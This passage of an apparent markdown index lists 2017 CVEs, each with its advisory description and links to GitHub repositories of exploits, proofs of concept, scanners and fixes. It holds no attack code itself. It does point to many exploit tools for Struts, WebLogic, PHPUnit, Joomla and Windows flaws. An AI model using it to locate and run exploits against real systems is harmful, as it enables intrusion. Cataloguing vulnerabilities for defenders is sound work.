- [kienquoc102/CVE-2017-8225](https://github.com/kienquoc102/CVE-2017-8225)
- [K3ysTr0K3R/CVE-2017-8225-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-8225-EXPLOIT)
### CVE-2017-8295 (2017-05-04)
WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for this message to bounce or be resent, leading to transmission of the reset key to a mailbox on an attacker-controlled SMTP server. This is related to problematic use of the SERVER_NAME variable in wp-includes/pluggable.php in conjunction with the PHP mail function. Exploitation is not achievable in all cases because it requires at least one of the following: (1) the attacker can prevent the victim from receiving any e-mail messages for an extended period of time (such as 5 days), (2) the victim's e-mail system sends an autoresponse containing the original message, or (3) the victim manually composes a reply containing the original message.
- [homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset](https://github.com/homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset)
- [alash3al/wp-allowed-hosts](https://github.com/alash3al/wp-allowed-hosts)
- [cyberheartmi9/CVE-2017-8295](https://github.com/cyberheartmi9/CVE-2017-8295)
### CVE-2017-8367 (2017-04-30)
Buffer overflow in Ether Software Easy MOV Converter 1.4.24, Easy DVD Creator, Easy MPEG/AVI/DIVX/WMV/RM to DVD, Easy Avi/Divx/Xvid to DVD Burner, Easy MPEG to DVD Burner, Easy WMV/ASF/ASX to DVD Burner, Easy RM RMVB to DVD Burner, Easy CD DVD Copy, MP3/AVI/MPEG/WMV/RM to Audio CD Burner, MP3/WAV/OGG/WMA/AC3 to CD Burner, MP3 WAV to CD Burner, My Video Converter, Easy AVI DivX Converter, Easy Video to iPod Converter, Easy Video to PSP Converter, Easy Video to 3GP Converter, Easy Video to MP4 Converter, and Easy Video to iPod/MP4/PSP/3GP Converter allows local attackers to cause a denial of service (SEH overwrite) or possibly have unspecified other impact via a long username.
- [rnnsz/CVE-2017-8367](https://github.com/rnnsz/CVE-2017-8367)
### CVE-2017-8382 (2017-05-16)
admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts.
- [faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc](https://github.com/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc)
### CVE-2017-8464 (2017-06-15)
Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka "LNK Remote Code Execution Vulnerability."
- [Elm0D/CVE-2017-8464](https://github.com/Elm0D/CVE-2017-8464)
- [3gstudent/CVE-2017-8464-EXP](https://github.com/3gstudent/CVE-2017-8464-EXP)
- [doudouhala/CVE-2017-8464-exp-generator](https://github.com/doudouhala/CVE-2017-8464-exp-generator)
- [X-Vector/usbhijacking](https://github.com/X-Vector/usbhijacking)
- [xssfile/CVE-2017-8464-EXP](https://github.com/xssfile/CVE-2017-8464-EXP)
- [TrG-1999/DetectPacket-CVE-2017-8464](https://github.com/TrG-1999/DetectPacket-CVE-2017-8464)
- [tuankiethkt020/Phat-hien-CVE-2017-8464](https://github.com/tuankiethkt020/Phat-hien-CVE-2017-8464)
- [TieuLong21Prosper/Detect-CVE-2017-8464](https://github.com/TieuLong21Prosper/Detect-CVE-2017-8464)
### CVE-2017-8465 (2017-06-15)
Microsoft Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to run processes in an elevated context when the Windows kernel improperly handles objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This CVE ID is unique from CVE-2017-8468.
- [nghiadt1098/CVE-2017-8465](https://github.com/nghiadt1098/CVE-2017-8465)
### CVE-2017-8529 (2017-06-15)
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, and Windows Server 2012 and R2 allow an attacker to detect specific files on the user's computer when affected Microsoft scripting engines do not properly handle objects in memory, aka "Microsoft Browser Information Disclosure Vulnerability".
- [sfitpro/cve-2017-8529](https://github.com/sfitpro/cve-2017-8529)
- [kaddirov/windows2016fixCVE-2017-8529](https://github.com/kaddirov/windows2016fixCVE-2017-8529)
### CVE-2017-8543 (2017-06-15)
Microsoft Windows XP SP3, Windows XP x64 XP2, Windows Server 2003 SP2, Windows Vista, Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to take control of the affected system when Windows Search fails to handle objects in memory, aka "Windows Search Remote Code Execution Vulnerability".
- [americanhanko/windows-security-cve-2017-8543](https://github.com/americanhanko/windows-security-cve-2017-8543)
### CVE-2017-8570 (2017-07-11)
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.
- [temesgeny/ppsx-file-generator](https://github.com/temesgeny/ppsx-file-generator)
- [rxwx/CVE-2017-8570](https://github.com/rxwx/CVE-2017-8570)
- [MaxSecurity/Office-CVE-2017-8570](https://github.com/MaxSecurity/Office-CVE-2017-8570)
- [SwordSheath/CVE-2017-8570](https://github.com/SwordSheath/CVE-2017-8570)
- [Drac0nids/CVE-2017-8570](https://github.com/Drac0nids/CVE-2017-8570)
- [sasqwatch/CVE-2017-8570](https://github.com/sasqwatch/CVE-2017-8570)
- [erfze/CVE-2017-8570](https://github.com/erfze/CVE-2017-8570)
### CVE-2017-8625 (2017-08-08)
Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to bypass Device Guard User Mode Code Integrity (UMCI) policies due to Internet Explorer failing to validate UMCI policies, aka "Internet Explorer Security Feature Bypass Vulnerability".
- [homjxi0e/CVE-2017-8625_Bypass_UMCI](https://github.com/homjxi0e/CVE-2017-8625_Bypass_UMCI)
### CVE-2017-8641 (2017-08-08)
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
- [homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject](https://github.com/homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject)
### CVE-2017-8759 (2017-09-13)
Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka ".NET Framework Remote Code Execution Vulnerability."
- [Voulnet/CVE-2017-8759-Exploit-sample](https://github.com/Voulnet/CVE-2017-8759-Exploit-sample)
- [nccgroup/CVE-2017-8759](https://github.com/nccgroup/CVE-2017-8759)
- [vysecurity/CVE-2017-8759](https://github.com/vysecurity/CVE-2017-8759)
- [BasuCert/CVE-2017-8759](https://github.com/BasuCert/CVE-2017-8759)
- [tahisaad6/CVE-2017-8759-Exploit-sample2](https://github.com/tahisaad6/CVE-2017-8759-Exploit-sample2)
- [homjxi0e/CVE-2017-8759_-SOAP_WSDL](https://github.com/homjxi0e/CVE-2017-8759_-SOAP_WSDL)
- [bhdresh/CVE-2017-8759](https://github.com/bhdresh/CVE-2017-8759)
- [JonasUliana/CVE-2017-8759](https://github.com/JonasUliana/CVE-2017-8759)
- [sythass/CVE-2017-8759](https://github.com/sythass/CVE-2017-8759)
- [ashr/CVE-2017-8759-exploits](https://github.com/ashr/CVE-2017-8759-exploits)
- [l0n3rs/CVE-2017-8759](https://github.com/l0n3rs/CVE-2017-8759)
- [ChaitanyaHaritash/CVE-2017-8759](https://github.com/ChaitanyaHaritash/CVE-2017-8759)
- [smashinu/CVE-2017-8759Expoit](https://github.com/smashinu/CVE-2017-8759Expoit)
- [adeljck/CVE-2017-8759](https://github.com/adeljck/CVE-2017-8759)
- [zhengkook/CVE-2017-8759](https://github.com/zhengkook/CVE-2017-8759)
- [varunsaru/SNP](https://github.com/varunsaru/SNP)
- [GayashanM/OHTS](https://github.com/GayashanM/OHTS)
### CVE-2017-8760 (2017-05-05)
An issue was discovered on Accellion FTA devices before FTA_9_12_180. There is XSS in courier/1000@/index.html with the auth_params parameter. The device tries to use internal WAF filters to stop specific XSS Vulnerabilities. However, these can be bypassed by using some modifications to the payloads, e.g., URL encoding.
- [Voraka/cve-2017-8760](https://github.com/Voraka/cve-2017-8760)
### CVE-2017-8779 (2017-05-04)
rpcbind through 0.2.4, LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3 do not consider the maximum RPC data size during memory allocation for XDR strings, which allows remote attackers to cause a denial of service (memory consumption with no subsequent free) via a crafted UDP packet to port 111, aka rpcbomb.
- [drbothen/GO-RPCBOMB](https://github.com/drbothen/GO-RPCBOMB)
### CVE-2017-8802 (2018-01-16)
Cross-site scripting (XSS) vulnerability in Zimbra Collaboration Suite (aka ZCS) before 8.8.0 Beta2 might allow remote attackers to inject arbitrary web script or HTML via vectors related to the "Show Snippet" functionality.
- [ozzi-/Zimbra-CVE-2017-8802-Hotifx](https://github.com/ozzi-/Zimbra-CVE-2017-8802-Hotifx)
### CVE-2017-8809 (2017-11-15)
api.php in MediaWiki before 1.27.4, 1.28.x before 1.28.3, and 1.29.x before 1.29.2 has a Reflected File Download vulnerability.
- [motikan2010/CVE-2017-8809_MediaWiki_RFD](https://github.com/motikan2010/CVE-2017-8809_MediaWiki_RFD)
### CVE-2017-8890 (2017-05-10)
The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel through 4.10.15 allows attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call.
- [beraphin/CVE-2017-8890](https://github.com/beraphin/CVE-2017-8890)
- [thinkycx/CVE-2017-8890](https://github.com/thinkycx/CVE-2017-8890)
- [7043mcgeep/cve-2017-8890-msf](https://github.com/7043mcgeep/cve-2017-8890-msf)
### CVE-2017-8917 (2017-05-17)
SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
- [brianwrf/Joomla3.7-SQLi-CVE-2017-8917](https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917)
- [stefanlucas/Exploit-Joomla](https://github.com/stefanlucas/Exploit-Joomla)
- [cved-sources/cve-2017-8917](https://github.com/cved-sources/cve-2017-8917)
- [gmohlamo/CVE-2017-8917](https://github.com/gmohlamo/CVE-2017-8917)
- [AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection](https://github.com/AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection)
- [Siopy/CVE-2017-8917](https://github.com/Siopy/CVE-2017-8917)
- [ionutbaltariu/joomla_CVE-2017-8917](https://github.com/ionutbaltariu/joomla_CVE-2017-8917)
- [BaptisteContreras/CVE-2017-8917-Joomla](https://github.com/BaptisteContreras/CVE-2017-8917-Joomla)
- [gloliveira1701/Joomblah](https://github.com/gloliveira1701/Joomblah)
### CVE-2017-9096 (2017-11-08)
The XML parsers in iText before 5.5.12 and 7.x before 7.0.3 do not disable external entities, which might allow remote attackers to conduct XML external entity (XXE) attacks via a crafted PDF.
- [jakabakos/CVE-2017-9096-iText-XXE](https://github.com/jakabakos/CVE-2017-9096-iText-XXE)
### CVE-2017-9097 (2017-06-16)
In Anti-Web through 3.8.7, as used on NetBiter FGW200 devices through 3.21.2, WS100 devices through 3.30.5, EC150 devices through 1.40.0, WS200 devices through 3.30.4, EC250 devices through 1.40.0, and other products, an LFI vulnerability allows a remote attacker to read or modify files through a path traversal technique, as demonstrated by reading the password file, or using the template parameter to cgi-bin/write.cgi to write to an arbitrary file.
- [MDudek-ICS/AntiWeb_testing-Suite](https://github.com/MDudek-ICS/AntiWeb_testing-Suite)
### CVE-2017-9101 (2017-05-21)
import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header and PHP code in the name of a file.
- [jasperla/CVE-2017-9101](https://github.com/jasperla/CVE-2017-9101)
### CVE-2017-9248 (2017-07-03)
Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise.
- [bao7uo/dp_crypto](https://github.com/bao7uo/dp_crypto)
- [capt-meelo/Telewreck](https://github.com/capt-meelo/Telewreck)
- [ictnamanh/CVE-2017-9248](https://github.com/ictnamanh/CVE-2017-9248)
- [oldboysonnt/dp](https://github.com/oldboysonnt/dp)
- [blacklanternsecurity/dp_cryptomg](https://github.com/blacklanternsecurity/dp_cryptomg)
- [cehamod/UI_CVE-2017-9248](https://github.com/cehamod/UI_CVE-2017-9248)
- [hlong12042/CVE-2017-9248](https://github.com/hlong12042/CVE-2017-9248)
### CVE-2017-9417 (2017-06-03)
Broadcom BCM43xx Wi-Fi chips allow remote attackers to execute arbitrary code via unspecified vectors, aka the "Broadpwn" issue.
- [mailinneberg/Broadpwn](https://github.com/mailinneberg/Broadpwn)
### CVE-2017-9430 (2017-06-05)
Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string.
- [homjxi0e/CVE-2017-9430](https://github.com/homjxi0e/CVE-2017-9430)
- [j0lama/Dnstracer-1.9-Fix](https://github.com/j0lama/Dnstracer-1.9-Fix)
### CVE-2017-9476 (2017-07-31)
The Comcast firmware on Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421733-160420a-CMCST); Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST); and Arris TG1682G (eMTA&DOCSIS version 10.0.132.SIP.PC20.CT, software version TG1682_2.2p7s2_PROD_sey) devices makes it easy for remote attackers to determine the hidden SSID and passphrase for a Home Security Wi-Fi network.
- [wiire-a/CVE-2017-9476](https://github.com/wiire-a/CVE-2017-9476)
### CVE-2017-9506 (2017-08-23)
The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
- [random-robbie/Jira-Scan](https://github.com/random-robbie/Jira-Scan)
- [pwn1sher/jira-ssrf](https://github.com/pwn1sher/jira-ssrf)
- [labsbots/CVE-2017-9506](https://github.com/labsbots/CVE-2017-9506)
### CVE-2017-9544 (2017-06-12)
There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long username string to registresult.htm for registering the user, an attacker may be able to execute arbitrary code.
- [adenkiewicz/CVE-2017-9544](https://github.com/adenkiewicz/CVE-2017-9544)
### CVE-2017-9554 (2017-07-24)
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
- [rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-](https://github.com/rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-)
- [Ez0-yf/CVE-2017-9554-Exploit-Tool](https://github.com/Ez0-yf/CVE-2017-9554-Exploit-Tool)
### CVE-2017-9606 (2017-06-15)
Infotecs ViPNet Client and Coordinator before 4.3.2-42442 allow local users to gain privileges by placing a Trojan horse ViPNet update file in the update folder. The attack succeeds because of incorrect folder permissions in conjunction with a lack of integrity and authenticity checks.
- [Houl777/CVE-2017-9606](https://github.com/Houl777/CVE-2017-9606)
### CVE-2017-9608 (2017-12-27)
The dnxhd decoder in FFmpeg before 3.2.6, and 3.3.x before 3.3.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted mov file.
- [LaCinquette/practice-22-23](https://github.com/LaCinquette/practice-22-23)
### CVE-2017-9609 (2017-07-17)
Cross-site scripting (XSS) vulnerability in Blackcat CMS 1.2 allows remote authenticated users to inject arbitrary web script or HTML via the map_language parameter to backend/pages/lang_settings.php.
- [faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc)
### CVE-2017-9627 (2017-07-07)
An Uncontrolled Resource Consumption issue was discovered in Schneider Electric Wonderware ArchestrA Logger, versions 2017.426.2307.1 and prior. The uncontrolled resource consumption vulnerability could allow an attacker to exhaust the memory resources of the machine, causing a denial of service.
- [USSCltd/aaLogger](https://github.com/USSCltd/aaLogger)
### CVE-2017-9757 (2017-06-19)
IPFire 2.19 has a Remote Command Injection vulnerability in ids.cgi via the OINKCODE parameter, which is mishandled by a shell. This can be exploited directly by authenticated users, or through CSRF.
- [peterleiva/CVE-2017-9757](https://github.com/peterleiva/CVE-2017-9757)
### CVE-2017-9769 (2017-08-02)
A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.
- [kkent030315/CVE-2017-9769](https://github.com/kkent030315/CVE-2017-9769)
### CVE-2017-9779 (2017-09-07)
OCaml compiler allows attackers to have unspecified impact via unknown vectors, a similar issue to CVE-2017-9772 "but with much less impact."
- [homjxi0e/CVE-2017-9779](https://github.com/homjxi0e/CVE-2017-9779)
### CVE-2017-9791 (2017-07-10)
The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
- [IanSmith123/s2-048](https://github.com/IanSmith123/s2-048)
- [dragoneeg/Struts2-048](https://github.com/dragoneeg/Struts2-048)
- [xfer0/CVE-2017-9791](https://github.com/xfer0/CVE-2017-9791)
### CVE-2017-9798 (2017-09-18)
Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.
- [nitrado/CVE-2017-9798](https://github.com/nitrado/CVE-2017-9798)
- [pabloec20/optionsbleed](https://github.com/pabloec20/optionsbleed)
- [l0n3rs/CVE-2017-9798](https://github.com/l0n3rs/CVE-2017-9798)
- [brokensound77/OptionsBleed-POC-Scanner](https://github.com/brokensound77/OptionsBleed-POC-Scanner)
### CVE-2017-9805 (2017-09-15)
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
- [luc10/struts-rce-cve-2017-9805](https://github.com/luc10/struts-rce-cve-2017-9805)
- [hahwul/struts2-rce-cve-2017-9805-ruby](https://github.com/hahwul/struts2-rce-cve-2017-9805-ruby)
- [mazen160/struts-pwn_CVE-2017-9805](https://github.com/mazen160/struts-pwn_CVE-2017-9805)
- [Lone-Ranger/apache-struts-pwn_CVE-2017-9805](https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805)
- [0x00-0x00/-CVE-2017-9805](https://github.com/0x00-0x00/-CVE-2017-9805)
- [BeyondCy/S2-052](https://github.com/BeyondCy/S2-052)
- [chrisjd20/cve-2017-9805.py](https://github.com/chrisjd20/cve-2017-9805.py)
- [UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-](https://github.com/UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-)
- [UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit](https://github.com/UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit)
- [AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378](https://github.com/AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378)
- [wifido/CVE-2017-9805-Exploit](https://github.com/wifido/CVE-2017-9805-Exploit)
- [rvermeulen/apache-struts-cve-2017-9805](https://github.com/rvermeulen/apache-struts-cve-2017-9805)
- [jongmartinez/-CVE-2017-9805-](https://github.com/jongmartinez/-CVE-2017-9805-)
- [z3bd/CVE-2017-9805](https://github.com/z3bd/CVE-2017-9805)
- [0xd3vil/CVE-2017-9805-Exploit](https://github.com/0xd3vil/CVE-2017-9805-Exploit)
- [Shakun8/CVE-2017-9805](https://github.com/Shakun8/CVE-2017-9805)
### CVE-2017-9822 (2017-07-20)
DNN (aka DotNetNuke) before 9.1.1 has Remote Code Execution via a cookie, aka "2017-08 (Critical) Possible remote code execution on DNN sites."
- [murataydemir/CVE-2017-9822](https://github.com/murataydemir/CVE-2017-9822)
### CVE-2017-9830 (2017-06-27)
Remote Code Execution is possible in Code42 CrashPlan 5.4.x via the org.apache.commons.ssl.rmi.DateRMI Java class, because (upon instantiation) it creates an RMI server that listens on a TCP port and deserializes objects sent by TCP clients.
- [securifera/CVE-2017-9830](https://github.com/securifera/CVE-2017-9830)
### CVE-2017-9833 (2017-06-24)
/cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.
- [anldori/CVE-2017-9833](https://github.com/anldori/CVE-2017-9833)
### CVE-2017-9841 (2017-06-27)
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
- [mbrasile/CVE-2017-9841](https://github.com/mbrasile/CVE-2017-9841)
- [RandomRobbieBF/phpunit-brute](https://github.com/RandomRobbieBF/phpunit-brute)
- [cyberharsh/Php-unit-CVE-2017-9841](https://github.com/cyberharsh/Php-unit-CVE-2017-9841)
- [ludy-dev/PHPUnit_eval-stdin_RCE](https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE)
- [incogbyte/laravel-phpunit-rce-masscaner](https://github.com/incogbyte/laravel-phpunit-rce-masscaner)
- [akr3ch/CVE-2017-9841](https://github.com/akr3ch/CVE-2017-9841)
- [p1ckzi/CVE-2017-9841](https://github.com/p1ckzi/CVE-2017-9841)
- [jax7sec/CVE-2017-9841](https://github.com/jax7sec/CVE-2017-9841)
- [mileticluka1/eval-stdin](https://github.com/mileticluka1/eval-stdin)
- [dream434/CVE-2017-9841-](https://github.com/dream434/CVE-2017-9841-)
- [MadExploits/PHPunit-Exploit](https://github.com/MadExploits/PHPunit-Exploit)
- [MrG3P5/CVE-2017-9841](https://github.com/MrG3P5/CVE-2017-9841)
- [Chocapikk/CVE-2017-9841](https://github.com/Chocapikk/CVE-2017-9841)
### CVE-2017-9934 (2017-07-17)
Missing CSRF token checks and improper input validation in Joomla! CMS 1.7.3 through 3.7.2 lead to an XSS vulnerability.
- [xyringe/CVE-2017-9934](https://github.com/xyringe/CVE-2017-9934)
### CVE-2017-9947 (2017-10-23)
A vulnerability has been identified in Siemens APOGEE PXC and TALON TC BACnet Automation Controllers in all versions <V3.5. A directory traversal vulnerability could allow a remote attacker with network access to the integrated web server (80/tcp and 443/tcp) to obtain information on the structure of the file system of the affected devices.
- [RoseSecurity/APOLOGEE](https://github.com/RoseSecurity/APOLOGEE)
### CVE-2017-9999
- [homjxi0e/CVE-2017-9999_bypassing_General_Firefox](https://github.com/homjxi0e/CVE-2017-9999_bypassing_General_Firefox)
### CVE-2017-10235 (2017-08-08)
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). The supported version that is affected is Prior to 5.1.24. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 6.7 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H).
- [fundacion-sadosky/vbox_cve_2017_10235](https://github.com/fundacion-sadosky/vbox_cve_2017_10235)
### CVE-2017-10271 (2017-10-19)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
- [1337g/CVE-2017-10271](https://github.com/1337g/CVE-2017-10271)
- [s3xy/CVE-2017-10271](https://github.com/s3xy/CVE-2017-10271)
- [ZH3FENG/PoCs-Weblogic_2017_10271](https://github.com/ZH3FENG/PoCs-Weblogic_2017_10271)
- [c0mmand3rOpSec/CVE-2017-10271](https://github.com/c0mmand3rOpSec/CVE-2017-10271)
- [Luffin/CVE-2017-10271](https://github.com/Luffin/CVE-2017-10271)
- [cjjduck/weblogic_wls_wsat_rce](https://github.com/cjjduck/weblogic_wls_wsat_rce)
- [kkirsche/CVE-2017-10271](https://github.com/kkirsche/CVE-2017-10271)
- [pssss/CVE-2017-10271](https://github.com/pssss/CVE-2017-10271)
- [SuperHacker-liuan/cve-2017-10271-poc](https://github.com/SuperHacker-liuan/cve-2017-10271-poc)
- [peterpeter228/Oracle-WebLogic-CVE-2017-10271](https://github.com/peterpeter228/Oracle-WebLogic-CVE-2017-10271)
- [Cymmetria/weblogic_honeypot](https://github.com/Cymmetria/weblogic_honeypot)
- [JackyTsuuuy/weblogic_wls_rce_poc-exp](https://github.com/JackyTsuuuy/weblogic_wls_rce_poc-exp)
- [lonehand/Oracle-WebLogic-CVE-2017-10271-master](https://github.com/lonehand/Oracle-WebLogic-CVE-2017-10271-master)
- [shack2/javaserializetools](https://github.com/shack2/javaserializetools)
- [ETOCheney/JavaDeserialization](https://github.com/ETOCheney/JavaDeserialization)
- [r4b3rt/CVE-2017-10271](https://github.com/r4b3rt/CVE-2017-10271)
- [cved-sources/cve-2017-10271](https://github.com/cved-sources/cve-2017-10271)
- [XHSecurity/Oracle-WebLogic-CVE-2017-10271](https://github.com/XHSecurity/Oracle-WebLogic-CVE-2017-10271)
- [kbsec/Weblogic_Wsat_RCE](https://github.com/kbsec/Weblogic_Wsat_RCE)
- [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961)
- [Yuusuke4/WebLogic_CNVD_C_2019_48814](https://github.com/Yuusuke4/WebLogic_CNVD_C_2019_48814)
- [7kbstorm/WebLogic_CNVD_C2019_48814](https://github.com/7kbstorm/WebLogic_CNVD_C2019_48814)
- [ianxtianxt/-CVE-2017-10271-](https://github.com/ianxtianxt/-CVE-2017-10271-)
- [testwc/CVE-2017-10271](https://github.com/testwc/CVE-2017-10271)
- [Al1ex/CVE-2017-10271](https://github.com/Al1ex/CVE-2017-10271)
- [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC)
- [KKsdall/7kbstormq](https://github.com/KKsdall/7kbstormq)
### CVE-2017-10352 (2017-10-19)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).
- [bigsizeme/weblogic-XMLDecoder](https://github.com/bigsizeme/weblogic-XMLDecoder)
### CVE-2017-10366 (2017-10-19)
